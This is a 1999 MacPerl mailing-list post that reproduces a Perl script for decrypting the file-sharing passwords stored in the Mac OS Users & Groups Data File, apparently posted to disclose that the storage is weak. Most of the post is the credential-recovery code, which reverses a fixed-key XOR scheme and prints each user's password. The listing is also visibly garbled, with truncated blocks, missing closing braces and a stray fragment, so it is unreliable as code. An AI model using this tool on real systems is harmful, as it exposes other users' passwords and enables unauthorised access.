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Re: [MacPerl] Are Your File Sharing Passwords Safe?

At 15.16 -0400 1999.07.14, Chris Nandor wrote:
>If you have Mac::Glue installed (and the Users and Groups OSAX), you can
>run this and find out (hint: the answer is "no").
>    http://pudge.net/files/macperl/scripts/decrypt_users_and_groups.plx

Since pudge.net could go down any moment now, here is the script.  It isn't
too long, most of the code there is just getting the user names and ID

#!perl -w
# decrypt_users_and_groups.plx - decrypt Users & Groups passwords
# by Chris Nandor, pudge@pobox.com, http://pudge.net/
# Wednesday, July 14, 1999
# Requirements:
# MacPerl
#   <URL:http://www.macperl.com/>
# Users and Groups OSAX
#   <URL:http://hyperarchive.lcs.mit.edu/HyperArchive/Archive
#       /dev/osa/users-and-groups-osax-12b.hqx>
# Mac::Glue and cpan-mac
#   <URL:http://www.perl.com/CPAN/authors/id/CNANDOR/>

use Fcntl;
use Mac::Files;
use Mac::Glue ':all';
use POSIX 'isprint';
use strict;

my($f, %u, $u, $t, @k, $g);
$f = $ARGV[0] ||
    FindFolder(kOnSystemDisk, kPreferencesFolderType) .
    ':Users & Groups Data File';
$g = new Mac::Glue 'Finder';

while (1) {
    my $info = $g->get_next_user_info( $u ? (name => $u) : () );
    if (exists $info->{'ID  '}) {
        $u{$info->{pnam}} = $info->{'ID  '};
        $u = $info->{pnam};
    } else {

@k = map ord, qw(s p c g t p r k);
sysopen F, $f, O_RDONLY or die $!;
read F, $t, -s $f;

for my $u (sort {$u{$a} <=> $u{$b}} keys %u) {
    MAIN: while ($t =~ /$u\000?(.{8})/gs) {
        my(@b, $p) = unpack 'C*', $1;
        next if $b[0] == 0;
        for my $i (0 .. $#b) {
            # i think i have the algorithm right, here,
            # it is different than the one encountered
            # on http://www.securityfocus.com/vdb/bottom.html?vid=519
            # first character seems to be XORd with user's ID XOR 1

            my $c = $b[$i] ^ ($i == 0 ? $u{$u} ^ 1 : $b[$i-1]) ^ $k[$i];
            next MAIN if $c != 0 && ! isprint(chr $c);
            $p .= chr $c;
        $p =~ s/\000+$//;
        printf "possible password for '$u': $p\n";

    $Mac::AppleEvents::Simple::AE_GET{UREC} = sub {
            (AECoerceDesc(shift, typeAERecord))


Chris Nandor          mailto:pudge@pobox.com         http://pudge.net/
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